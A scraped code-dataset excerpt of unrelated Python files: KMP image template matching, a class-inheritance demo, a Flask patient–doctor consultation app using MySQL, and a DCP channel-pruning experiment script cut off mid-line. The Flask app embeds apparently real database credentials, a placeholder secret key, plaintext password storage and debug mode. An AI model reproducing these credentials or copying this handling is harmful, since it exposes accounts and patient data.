filters.gaussian_filter(arr22,sigma=1) # 用高斯滤波增强鲁棒\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n smaStr = np.sum(arr2,axis=0,dtype=np.longlong) #向x轴投影(求和),不再求差分\r\n\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei-sHei+1):\r\n bigStr = np.sum(arr1[i:i+sHei,:],axis=0,dtype=np.longlong) # 向x轴投影(求和)\r\n\r\n #:use Kmp\r\n temws, fit, teml = KMP(bigStr,smaStr,True)\r\n if teml > bestFitLen:\r\n bestWidth = [temws,]\r\n bestFitLen = teml\r\n bestHeight = [i]\r\n elif teml == bestFitLen:\r\n bestWidth.append(temws) # 注意是嵌套的两个列表\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('Height , width is:', bestHeight)\r\n print(bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid)\r\n # ~ 发现高斯滤波的效果反而不好\r\n\r\n\r\ndef find_poi_by_String(picB, picS):\r\n '''\r\n 在一个图片中查找一个子图/模板图的位置。但这里没有求图像的差分。\r\n result:看情况,只要噪声不大用这个版本就好\r\n 将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 首先转换为灰度矩阵。再将图像0-1化了(这里的粒度可以修改)\r\n 得到小图字符串。对大图切成和小图一样宽的行,找到在这一行中的最佳匹配,\r\n 循环对所有行(注意行是相互���叠的,相差一个像素行一个像素行),找到最佳的位置。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr11 = np.array(Image.open(picB).convert('L'))\r\n arr22 = np.array(Image.open(picS).convert('L'))\r\n arr1 = np.round(arr11/128)\r\n arr2 = np.round(arr22/128) # 为了更鲁棒。数值可以调。\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = 
arr2.shape\r\n smaStr = np.sum(arr2,axis=0,dtype=np.longlong) #向x轴投影(求和)\r\n\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei-sHei+1):\r\n bigStr = np.sum(arr1[i:i+sHei,:],axis=0,dtype=np.longlong) # 向x轴投影(求和)\r\n\r\n #:use Kmp\r\n temws, fit, teml = KMP(bigStr,smaStr,True) # 为了更鲁棒,可用KPM_near\r\n if teml > bestFitLen:\r\n bestWidth = [temws,]\r\n bestFitLen = teml\r\n bestHeight = [i]\r\n elif teml == bestFitLen:\r\n bestWidth.append(temws)\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('Ans is:', bestHeight)\r\n print(bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid)\r\n\r\n\r\ndef find_poi_by_StringMean(picB, picS):\r\n '''\r\n 在一个图片中查找一个子图/模板图的位置。不求差分,用平均值增强鲁棒。\r\n 同时还可以考虑使用KPM—near\r\n result:效果可以。\r\n 将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 首先转换为灰度矩阵。再将图像0-1化了(这里的粒度可以修改)\r\n 得到小图字符串。对大图切成和小图一样宽的行,找到在这一行中的最佳匹配,\r\n 循环对所有行(注意行是相互重叠的,相差一个像素行一个像素行),找到最佳的位置。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr1 = np.array(Image.open(picB).convert('L'))\r\n arr2 = np.array(Image.open(picS).convert('L')) # 转灰度矩阵,不再进行粒度模糊。\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n smaStr = np.mean(arr2,axis=0,dtype=np.longlong) #向x轴投影(求均值)\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei-sHei+1):\r\n bigStr = np.mean(arr1[i:i+sHei,:],axis=0,dtype=np.longlong) # 向x轴投影(求均值)\r\n #:use Kmp\r\n temws, fit, teml = KMP_near(bigStr,smaStr,True,2) # 为了更鲁棒,可用KPM_near\r\n if teml > bestFitLen:\r\n bestWidth = [temws,]\r\n bestFitLen = teml\r\n bestHeight = [i]\r\n elif teml == bestFitLen:\r\n bestWidth.append(temws)\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('Ans is:', bestHeight)\r\n print(bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid)\r\n\r\n\r\ndef find_poi_by_StringMean2(picB, picS):\r\n '''\r\n 增加了方向选择,增强效率。因为KMP算法是相对很快的。\r\n 在一个图片中查找一个子图/模板图的位置。不求差分,用平均值增强鲁棒。\r\n 同时还可以考虑使用KPM—near\r\n 将图像投影到一维形成“字符串”,使用字符串匹配算法进行快速查找。\r\n 首先转换为灰度矩阵。再将图像0-1化了(这里的粒度可以修改)\r\n 得到小图字符串。对大图切成和小图一样宽的行,找到在这一行中的最佳匹配,\r\n 循环对所有行(注意行是相互重叠的,相差一个像素行一个像素行),找到最佳的位置。\r\n :param picB:大图,\r\n :param picS:小图,模板图,用于查找的图\r\n :return:打印最佳匹配的位置(可能有多个)\r\n 参照论文:孙远,周刚慧,赵立初,施鹏飞 灰度图像匹配的快速算法 上海交通大学学报\r\n '''\r\n arr1 = np.array(Image.open(picB).convert('L'))\r\n arr2 = np.array(Image.open(picS).convert('L'))\r\n Hei, Wid = arr1.shape\r\n sHei, sWid = arr2.shape\r\n # sWid = int(sWid/4)\r\n # 发现子图变小后,搜索时间反而变长了—— Wid次的字符串比较才是影响时间效率的主要因素\r\n if Hei > Wid:\r\n dirc = 1 # 向y轴投影更好\r\n smaStr = np.mean(arr2[:,:sWid], axis=dirc, dtype=np.longlong) # 向x\\y轴投影(求和)\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Wid - sWid + 1):\r\n bigStr = np.mean(arr1[:, i:i + sWid], axis=dirc, dtype=np.longlong) # 向x轴投影(求和)\r\n\r\n #:use Kmp\r\n temHeis, fit, temlen = KMP_int_near(bigStr, smaStr, True, 2) # 为了更鲁棒,可用KPM_near\r\n if temlen > bestFitLen:\r\n bestWidth = [i]\r\n bestFitLen = temlen\r\n bestHeight = [temHeis, ]\r\n elif temlen == bestFitLen:\r\n bestHeight.append(temHeis)\r\n bestWidth.append(i)\r\n else:\r\n pass\r\n else:# 向x轴投影\r\n dirc = 0\r\n smaStr = np.mean(arr2[:,:sWid], axis=dirc, dtype=np.longlong) # 向x\\y轴投影(求和)\r\n bestFitLen = 0\r\n bestWidth = list()\r\n bestHeight = list()\r\n for i in range(0, Hei - sHei + 1):\r\n bigStr = np.mean(arr1[i:i + sHei, :], axis=0, dtype=np.longlong) # 向x轴投影(求和)\r\n #:use Kmp\r\n temws, fit, temlen = KMP_near(bigStr, smaStr, True, 2) # 
为了更鲁棒,可用KPM_near\r\n if temlen > bestFitLen:\r\n bestWidth = [temws, ]\r\n bestFitLen = temlen\r\n bestHeight = [i]\r\n elif temlen == bestFitLen:\r\n bestWidth.append(temws)\r\n bestHeight.append(i)\r\n else:\r\n pass\r\n print('bestHeight is:', bestHeight)\r\n print('bestWidth is:', bestWidth)\r\n print('fit length vs sma length:',bestFitLen, sWid)\r\n\r\n\r\n\r\n# import time\r\n# c1 = time.clock()\r\n# # find_poi_by_StringMean('big.jpg','inbig2.jpg')\r\n# find_poi_by_StringMean3('00000033.tif','000000331.jpg')\r\n# c2 = time.clock()\r\n# print(c1,c2)\r\n","sub_path":"findPicPosition.py","file_name":"findPicPosition.py","file_ext":"py","file_size_in_byte":21659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"505832368","text":"class A:\n classvar1=23\n def __init__(self):\n self.var=\"name\"\n self.var1=\"class\"\n\n # my first class\n# format of searching varables ,instance varaible of object class -instance variable of inherited class- class variable of object class -class variable of inherited class\n# if there is a func,att of same name (inherited with one ) in two classes the object class override the inherted func ,att\n\nclass B(A):\n def __init__(self):\n # self.var=\"bname\"\n # self.var1='bclass'\n super().__init__() #here super method call my super file constructor\n # self.var = \"bname\"\n # self.var1='bclass'\n\n\nsam=B()\n\nprint(sam.var1)","sub_path":"super() and overridding.py","file_name":"super() and overridding.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"227873867","text":"from flask import Flask, render_template, request, redirect, url_for, session, Response, flash, jsonify\nimport MySQLdb.cursors\nimport re\nfrom flask_mysqldb import MySQL\nimport mysql.connector\nfrom mysql import connector\n\napp = Flask(__name__)\napp.secret_key = 'your secret key'\napp.config['MYSQL_HOST'] = 'sql12.freemysqlhosting.net'\napp.config['MYSQL_USER'] = 'sql12538682'\napp.config['MYSQL_PASSWORD'] = '2lTH75ycyC'\napp.config['MYSQL_PORT'] = 3306\napp.config['MYSQL_DB'] = 'sql12538682'\n\nmysql = MySQL(app)\n\n\n@app.route(\"/\", methods=[\"POST\", \"GET\"])\ndef login():\n return render_template('login.html')\n\n\n@app.route(\"/register\", methods=[\"POST\", \"GET\"])\ndef resister():\n msg = ''\n if request.method == 'POST' and 'name' in request.form and 'pwd' in request.form:\n name = request.form['name']\n mail = request.form['mail']\n pwd = request.form['pwd']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n sql = 'insert into patient (name,mail,pwd) values(%s,%s,%s)'\n values = (name, mail, pwd)\n cursor.execute(sql, values)\n mysql.connection.commit()\n print('hi')\n\n return jsonify({'success': 'Account not found'})\n return render_template('login.html')\n\n\n@app.route(\"/home\", methods=[\"POST\", \"GET\"])\ndef home():\n msg = ''\n if request.method == 'POST' and 'mail' in request.form and 'pwd' in request.form:\n mail = request.form['mail']\n pwd = request.form['pwd']\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'select * from patient where mail= %s and pwd =%s', (mail, pwd))\n account = cursor.fetchone()\n cursor.execute('select * from doctor')\n doctor = cursor.fetchall()\n\n cursor.execute('select * from queries')\n queries = cursor.fetchall()\n\n cursor.execute('select * from consult where patient_mail= %s', [mail])\n consult = cursor.fetchall()\n if 
consult:\n\n c = []\n for i in range(0, len(consult)):\n c.append(consult[i]['doctor_id'])\n else:\n c = []\n\n cursor.execute(\n \"SELECT distinct a.name , a.dept, a.link, b.status , b.timing from doctor a, consult b where a.id=b.doctor_id and b.patient_mail= %s \", [mail])\n status = cursor.fetchall()\n if status:\n status = status\n len1 = len(status)\n else:\n status = 0\n len1 = 0\n\n if account:\n session['loggedin'] = True\n session['s_mail'] = account['mail']\n session['s_pwd'] = account['pwd']\n return render_template('index.html', doctor=doctor, len=len(doctor), patient=account, c=c, status=status, len1=len1, queries=queries, len2=len(queries))\n else:\n return render_template('login.html', msg='incorrect username/password')\n\n elif 's_mail' in session:\n mail = session.get('s_mail')\n pwd = session.get('s_pwd')\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('select * from consult where patient_mail= %s', [mail])\n consult = cursor.fetchall()\n\n c = []\n for i in range(0, len(consult)):\n c.append(consult[i]['doctor_id'])\n\n cursor.execute(\n \"SELECT distinct a.name , a.dept, a.link, b.status , b.timing from doctor a, consult b where a.id=b.doctor_id and b.patient_mail= %s \", [mail])\n\n status = cursor.fetchall()\n\n cursor.execute(\n 'select * from patient where mail= %s and pwd =%s', (mail, pwd))\n account = cursor.fetchone()\n\n cursor.execute('select * from queries')\n queries = cursor.fetchall()\n\n cursor.execute('select * from doctor')\n doctor = cursor.fetchall()\n\n return render_template('index.html', doctor=doctor, len=len(doctor), patient=account, c=c, status=status,\n len1=len(status), queries=queries, len2=len(queries))\n\n else:\n return redirect(url_for('login'))\n\n\n@app.route(\"/consult\", methods=[\"POST\", \"GET\"])\ndef consult():\n if 's_mail' in session:\n patient_mail = request.args.get('a')\n doctor_id = request.args.get('b')\n # print(patient_mail)\n # print(doctor_id)\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'insert into consult (patient_mail,doctor_id) values (%s,%s)', (patient_mail, doctor_id))\n mysql.connection.commit()\n return redirect(url_for('home'))\n\n else:\n return redirect(url_for('login'))\n\n\n@app.route(\"/update\", methods=[\"POST\", \"GET\"])\ndef update():\n if 's_mail' in session and request.method == 'POST':\n name = request.form['name']\n age = request.form['age']\n gender = request.form['gender']\n location = request.form['location']\n BMI = request.form['bmi']\n mail = session.get('s_mail')\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('update patient set name = %s , age=%s, gender= %s , location=%s , BMI=%s where mail =%s',\n (name, age, gender, location, BMI, mail))\n mysql.connection.commit()\n return redirect(url_for('home'))\n else:\n return redirect(url_for('login'))\n\n\n@app.route('/askquery', methods=[\"POST\", \"GET\"])\ndef askquery():\n if 's_mail' in session and request.method == 'POST':\n usrquestion = request.form['usrquestion']\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'insert into queries (question) values(%s)', [usrquestion])\n mysql.connection.commit()\n return redirect(url_for('home'))\n else:\n return redirect(url_for('login'))\n\n\n@app.route('/logout/')\ndef logout():\n if 's_mail' in session:\n # Remove session data, this will log the user out\n session.clear()\n\n # Redirect to login page\n return 
redirect(url_for('login'))\n\n\n@app.route('/doctor', methods=[\"POST\", \"GET\"])\ndef doctorLogin():\n msg = ''\n if request.method == 'POST' and 'mail' in request.form:\n mail = request.form['mail']\n pwd = request.form['pwd']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'select * from doctor where mail= %s and pwd =%s', (mail, pwd))\n doctor = cursor.fetchone()\n if doctor:\n session['loggedin'] = True\n session['d_id'] = doctor['id']\n session['d_pwd'] = doctor['pwd']\n return redirect(url_for('docpage'))\n else:\n return render_template('doctor_login.html', msg='Invalid Credentials')\n\n return render_template('doctor_login.html', msg='')\n\n\n@app.route('/docpage/')\ndef docpage():\n if 'd_id' in session:\n id = session.get('d_id')\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('select * from doctor where id= %s ', [id])\n doctor = cursor.fetchone()\n\n cursor.execute('select * from queries')\n queries = cursor.fetchall()\n\n cursor.execute('SELECT a.name , b.patient_mail ,b.status,b.timing from patient a, consult b where a.mail = b.patient_mail and b.doctor_id= %s and b.status=%s', (id, 'Accepted'))\n check = cursor.fetchall()\n if check:\n check = len(check)\n else:\n check = 0\n cursor.execute(\n 'SELECT a.name , b.patient_mail ,b.status,b.timing from patient a, consult b where a.mail = b.patient_mail and b.doctor_id= %s ', [id])\n reques = cursor.fetchall()\n\n return render_template('doctor_main_page.html', reques=reques, len=len(reques), doctor=doctor, check=check, queries=queries, len2=len(queries))\n else:\n return render_template('doctor_login.html', msg='')\n\n\n@app.route('/consult_update', methods=[\"POST\", \"GET\"])\ndef consult_update():\n if 'd_id' in session and request.method == 'POST':\n id = session.get('d_id')\n patient_mail = request.form['patient_mail']\n bday = request.form['bday']\n timing = request.form['timing']\n\n timing = bday + \" \"+timing\n status = 'Accepted'\n\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute('update consult set status = %s, timing=%s where patient_mail = %s and doctor_id = %s',\n (status, timing, patient_mail, id))\n mysql.connection.commit()\n return redirect(url_for('docpage'))\n else:\n return render_template('doctor_login.html', msg='')\n\n\n@app.route('/answerquery', methods=[\"POST\", \"GET\"])\ndef answerquery():\n if 'd_id' in session and request.method == 'POST':\n sno = request.form['sno']\n answer = request.form['answer']\n cursor = mysql.connection.cursor(MySQLdb.cursors.DictCursor)\n cursor.execute(\n 'update queries set answer = %s, status = %s where sno= %s ', (answer, 'answered', sno))\n mysql.connection.commit()\n return redirect(url_for('docpage'))\n else:\n return render_template('doctor_login.html', msg='')\n\n\n@app.route('/doctorLogout/')\ndef doctorLogout():\n if 'd_id' in session:\n # Remove session data, this will log the user out\n session.clear()\n\n # Redirect to login page\n return redirect(url_for('doctorLogin'))\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"81237821","text":"import argparse\nimport copy\nimport datetime\nimport logging\nimport math\nimport os\nimport sys\nimport time\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.utils.data\nimport 
torch.utils.data.distributed\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nfrom option import Option\nfrom trainer import SegmentWiseTrainer, NetworkWiseTrainer\nfrom checkpoint import CheckPoint\n\nimport dcp.models as md\nimport dcp.utils as utils\nfrom dcp.mask_conv import MaskConv2d\nfrom dcp.models.preresnet import PreBasicBlock\nfrom dcp.models.resnet import BasicBlock, Bottleneck\nfrom visdom_logger.logger import VisdomLogger\n\nblock_num = {'vgg19': 19, 'lenet5':5, 'preresnet56': 27, 'preresnet18': 8, 'preresnet8': 3, 'resnet18': 8, 'resnet50': 16}\nfrom visdom_logger.logger import VisdomLogger\nfrom thop import profile\nclass LoggerForSacred():\n def __init__(self, visdom_logger, id, ex_logger=None):\n self.visdom_logger = visdom_logger\n self.ex_logger = ex_logger\n self.id = id\n\n\n def log_scalar(self, metrics_name, value, step):\n if self.visdom_logger is not None:\n self.visdom_logger.scalar(metrics_name + \"_{}\".format(self.id), step, [value])\n if self.ex_logger is not None:\n self.ex_logger.log_scalar(metrics_name + \"_{}\".format(self.id), value, step)\n\nclass Experiment(object):\n \"\"\"\n run experiments with pre-defined pipeline\n \"\"\"\n\n def __init__(self, options=None, conf_path=None, logger=None):\n self.settings = options or Option(conf_path)\n self.checkpoint = None\n self.train_loader = None\n self.val_loader = None\n self.ori_model = None\n self.pruned_model = None\n self.segment_wise_trainer = None\n\n self.aux_fc_state = None\n self.aux_fc_opt_state = None\n self.seg_opt_state = None\n self.current_pivot_index = None\n self.is_segment_wise_finetune = False\n self.is_channel_selection = False\n\n self.epoch = 0\n\n self.feature_cache_origin = {}\n self.feature_cache_pruned = {}\n\n self.settings.set_save_path()\n self.write_settings()\n self.logger = self.set_logger()\n self.v_logger = logger\n\n self.prepare()\n\n def write_settings(self):\n \"\"\"\n save experimental settings to a file\n \"\"\"\n\n with open(os.path.join(self.settings.save_path, \"settings.log\"), \"w\") as f:\n for k, v in self.settings.__dict__.items():\n f.write(str(k) + \": \" + str(v) + \"\\n\")\n\n def set_logger(self):\n \"\"\"\n initialize logger\n \"\"\"\n logger = logging.getLogger('channel_selection')\n file_formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')\n console_formatter = logging.Formatter('%(message)s')\n # file log\n file_handler = logging.FileHandler(os.path.join(self.settings.save_path, \"train_test.log\"))\n file_handler.setFormatter(file_formatter)\n\n # console log\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(console_formatter)\n\n logger.addHandler(file_handler)\n logger.addHandler(console_handler)\n\n logger.setLevel(logging.INFO)\n return logger\n\n def prepare(self):\n \"\"\"\n preparing experiments\n \"\"\"\n\n self._set_gpu()\n self._set_dataloader()\n self._set_model()\n self._cal_pivot()\n self._set_checkpoint()\n self._set_trainier()\n\n def _set_gpu(self):\n \"\"\"\n initialize the seed of random number generator\n \"\"\"\n\n # set torch seed\n # init random seed\n torch.manual_seed(self.settings.seed)\n torch.cuda.manual_seed(self.settings.seed)\n torch.cuda.set_device(0)\n cudnn.benchmark = True\n\n def _set_dataloader(self):\n \"\"\"\n create train loader and validation loader for channel pruning\n \"\"\"\n\n if self.settings.dataset == 'cifar10':\n data_root = os.path.join(self.settings.data_path, \"cifar\")\n\n norm_mean = [0.49139968, 
0.48215827, 0.44653124]\n norm_std = [0.24703233, 0.24348505, 0.26158768]\n train_transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std)])\n val_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std)])\n\n train_dataset = datasets.CIFAR10(root=data_root,\n train=True,\n transform=train_transform,\n download=True)\n val_dataset = datasets.CIFAR10(root=data_root,\n train=False,\n transform=val_transform)\n\n self.train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=self.settings.batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=self.settings.n_threads)\n self.val_loader = torch.utils.data.DataLoader(dataset=val_dataset,\n batch_size=self.settings.batch_size,\n shuffle=False,\n pin_memory=True,\n num_workers=self.settings.n_threads)\n\n elif self.settings.dataset == 'mnist':\n\n transform_train = transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n transform_test = transforms.Compose([\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n trainset = datasets.MNIST(root='./data', train=True, download=True, transform=transform_train)\n self.train_loader = torch.utils.data.DataLoader(trainset, batch_size=self.settings.batch_size, shuffle=True, num_workers=1)\n\n testset = datasets.MNIST(root='./data', train=False, download=True, transform=transform_test)\n self.val_loader = torch.utils.data.DataLoader(testset, batch_size=self.settings.batch_size, shuffle=True, num_workers=1)\n self.is_mnist = True\n\n elif self.settings.dataset == 'imagenet':\n dataset_path = os.path.join(self.settings.data_path, \"imagenet\")\n traindir = os.path.join(dataset_path, \"train\")\n valdir = os.path.join(dataset_path, 'val')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n self.train_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=self.settings.batch_size,\n shuffle=True,\n num_workers=self.settings.n_threads,\n pin_memory=True)\n\n self.val_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(valdir, transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=self.settings.batch_size,\n shuffle=False,\n num_workers=self.settings.n_threads,\n pin_memory=True)\n\n def _set_trainier(self):\n \"\"\"\n initialize segment-wise trainer trainer\n \"\"\"\n\n # initialize segment-wise trainer\n self.segment_wise_trainer = SegmentWiseTrainer(ori_model=self.ori_model,\n pruned_model=self.pruned_model,\n train_loader=self.train_loader,\n val_loader=self.val_loader,\n settings=self.settings,\n logger=self.logger,\n v_logger=self.v_logger)\n if self.aux_fc_state is not None:\n self.segment_wise_trainer.update_aux_fc(self.aux_fc_state, self.aux_fc_opt_state, self.seg_opt_state)\n\n def _set_model(self):\n \"\"\"\n get model\n \"\"\"\n\n if self.settings.dataset in [\"cifar10\", \"cifar100\"]:\n if self.settings.net_type == \"preresnet\":\n self.ori_model = md.PreResNet(depth=self.settings.depth, num_classes=self.settings.n_classes)\n self.pruned_model = 
md.PreResNet(depth=self.settings.depth, num_classes=self.settings.n_classes)\n if self.settings.net_type == 'vgg':\n self.ori_model = md.VGG_CIFAR(depth=self.settings.depth, num_classes=self.settings.n_classes)\n self.pruned_model = md.VGG_CIFAR(depth=self.settings.depth, num_classes=self.settings.n_classes)\n else:\n assert False, \"use {} data while network is {}\".format(self.settings.dataset, self.settings.net_type)\n\n elif self.settings.dataset in [\"mnist\"]:\n self.is_mnist = True\n if self.settings.net_type == \"preresnet\":\n self.ori_model = md.PreResNet(depth=self.settings.depth, num_classes=self.settings.n_classes, is_mnist=self.is_mnist)\n self.pruned_model = md.PreResNet(depth=self.settings.depth, num_classes=self.settings.n_classes, is_mnist=self.is_mnist)\n elif self.settings.net_type == 'lenet':\n self.ori_model = md.LeNet5()\n self.pruned_model = md.LeNet5()\n else:\n assert False, \"use {} data while network is {}\".format(self.settings.dataset, self.settings.net_type)\n\n elif self.settings.dataset in [\"imagenet\"]:\n if self.settings.net_type == \"resnet\":\n self.ori_model = md.ResNet(depth=self.settings.depth, num_classes=self.settings.n_classes)\n self.pruned_model = md.ResNet(depth=self.settings.depth, num_classes=self.settings.n_classes)\n else:\n assert False, \"use {} data while network is {}\".format(self.settings.dataset, self.settings.net_type)\n\n else:\n assert False, \"unsupported data set: {}\".format(self.settings.dataset)\n\n def _set_checkpoint(self):\n \"\"\"\n load pre-trained model or resume checkpoint\n \"\"\"\n\n assert self.ori_model is not None and self.pruned_model is not None, \"please create model first\"\n\n self.checkpoint = CheckPoint(self.settings.save_path, self.logger)\n self._load_retrain()\n self._load_resume()\n\n def _load_retrain(self):\n \"\"\"\n load pre-trained model\n \"\"\"\n\n if self.settings.retrain is not None:\n check_point_params = torch.load(self.settings.retrain)\n if \"ori_model\" not in check_point_params:\n model_state = check_point_params\n self.ori_model = self.checkpoint.load_state(self.ori_model, model_state)\n self.pruned_model = self.checkpoint.load_state(self.pruned_model, model_state)\n self.logger.info(\"|===>load restrain file: {}\".format(self.settings.retrain))\n else:\n ori_model_state = check_point_params[\"ori_model\"]\n pruned_model_state = check_point_params[\"pruned_model\"]\n # self.current_block_count = check_point_params[\"current_pivot\"]\n self.aux_fc_state = check_point_params[\"aux_fc\"]\n # self.replace_layer()\n self.ori_model = self.checkpoint.load_state(self.ori_model, ori_model_state)\n self.pruned_model = self.checkpoint.load_state(self.pruned_model, pruned_model_state)\n self.logger.info(\"|===>load pre-trained model: {}\".format(self.settings.retrain))\n\n def _load_resume(self):\n \"\"\"\n load resume checkpoint\n \"\"\"\n\n if self.settings.resume is not None:\n check_point_params = torch.load(self.settings.resume)\n ori_model_state = check_point_params[\"ori_model\"]\n pruned_model_state = check_point_params[\"pruned_model\"]\n self.aux_fc_state = check_point_params[\"aux_fc\"]\n self.aux_fc_opt_state = check_point_params[\"aux_fc_opt\"]\n self.seg_opt_state = check_point_params[\"seg_opt\"]\n self.current_pivot_index = check_point_params[\"current_pivot\"]\n self.is_segment_wise_finetune = check_point_params[\"segment_wise_finetune\"]\n self.is_channel_selection = check_point_params[\"channel_selection\"]\n self.epoch = check_point_params[\"epoch\"]\n self.epoch = 
self.settings.segment_wise_n_epochs\n self.current_block_count = check_point_params[\"current_block_count\"]\n\n if self.is_channel_selection or \\\n (self.is_segment_wise_finetune and self.current_pivot_index > self.settings.pivot_set[0]):\n self.replace_layer()\n self.ori_model = self.checkpoint.load_state(self.ori_model, ori_model_state)\n self.pruned_model = self.checkpoint.load_state(self.pruned_model, pruned_model_state)\n self.logger.info(\"|===>load resume file: {}\".format(self.settings.resume))\n\n def _cal_pivot(self):\n \"\"\"\n calculate the inserted layer for additional loss\n \"\"\"\n\n self.num_segments = self.settings.n_losses + 1\n num_block_per_segment = (block_num[self.settings.net_type + str(self.settings.depth)] // self.num_segments) + 1\n pivot_set = []\n for i in range(self.num_segments - 1):\n pivot_set.append(num_block_per_segment * (i + 1))\n self.settings.pivot_set = pivot_set\n self.logger.info(\"pivot set: {}\".format(pivot_set))\n\n def segment_wise_fine_tune(self, index):\n \"\"\"\n conduct segment-wise fine-tuning\n :param index: segment index\n \"\"\"\n\n best_top1 = 100\n best_top5 = 100\n\n start_epoch = 0\n if self.is_segment_wise_finetune and self.epoch != 0:\n start_epoch = self.epoch + 1\n self.epoch = 0\n for epoch in range(start_epoch, self.settings.segment_wise_n_epochs):\n train_error, train_loss, train5_error = self.segment_wise_trainer.train(epoch, index)\n val_error, val_loss, val5_error = self.segment_wise_trainer.val(epoch)\n\n # write and print result\n if isinstance(train_error, list):\n best_flag = False\n if best_top1 >= val_error[-1]:\n best_top1 = val_error[-1]\n best_top5 = val5_error[-1]\n best_flag = True\n\n else:\n best_flag = False\n if best_top1 >= val_error:\n best_top1 = val_error\n best_top5 = val5_error\n best_flag = True\n\n if best_flag:\n self.checkpoint.save_model(ori_model=self.ori_model, pruned_model=self.pruned_model,\n aux_fc=self.segment_wise_trainer.aux_fc,\n current_pivot=self.current_pivot_index,\n segment_wise_finetune=True, index=index)\n\n self.logger.info(\"|===>Best Result is: Top1 Error: {:f}, Top5 Error: {:f}\\n\".format(best_top1, best_top5))\n self.logger.info(\"|===>Best Result is: Top1 Accuracy: {:f}, Top5 Accuracy: {:f}\\n\".format(100 - best_top1,\n 100 - best_top5))\n\n if self.settings.dataset in [\"imagenet\"]:\n self.checkpoint.save_checkpoint(ori_model=self.ori_model,\n pruned_model=self.pruned_model,\n aux_fc=self.segment_wise_trainer.aux_fc,\n aux_fc_opt=self.segment_wise_trainer.fc_optimizer,\n seg_opt=self.segment_wise_trainer.seg_optimizer,\n current_pivot=self.current_pivot_index,\n segment_wise_finetune=True, index=index, epoch=epoch)\n else:\n self.checkpoint.save_checkpoint(ori_model=self.ori_model,\n pruned_model=self.pruned_model,\n aux_fc=self.segment_wise_trainer.aux_fc,\n aux_fc_opt=self.segment_wise_trainer.fc_optimizer,\n seg_opt=self.segment_wise_trainer.seg_optimizer,\n current_pivot=self.current_pivot_index,\n segment_wise_finetune=True, index=index)\n\n def replace_layer(self):\n \"\"\"\n Replace the convolutional layer to mask convolutional layer\n \"\"\"\n\n block_count = 0\n if self.settings.net_type in [\"preresnet\", \"resnet\"]:\n for module in self.pruned_model.modules():\n if isinstance(module, (PreBasicBlock, BasicBlock, Bottleneck)):\n block_count += 1\n layer = module.conv2\n if block_count <= self.current_block_count and not isinstance(layer, MaskConv2d):\n temp_conv = MaskConv2d(\n in_channels=layer.in_channels,\n out_channels=layer.out_channels,\n 
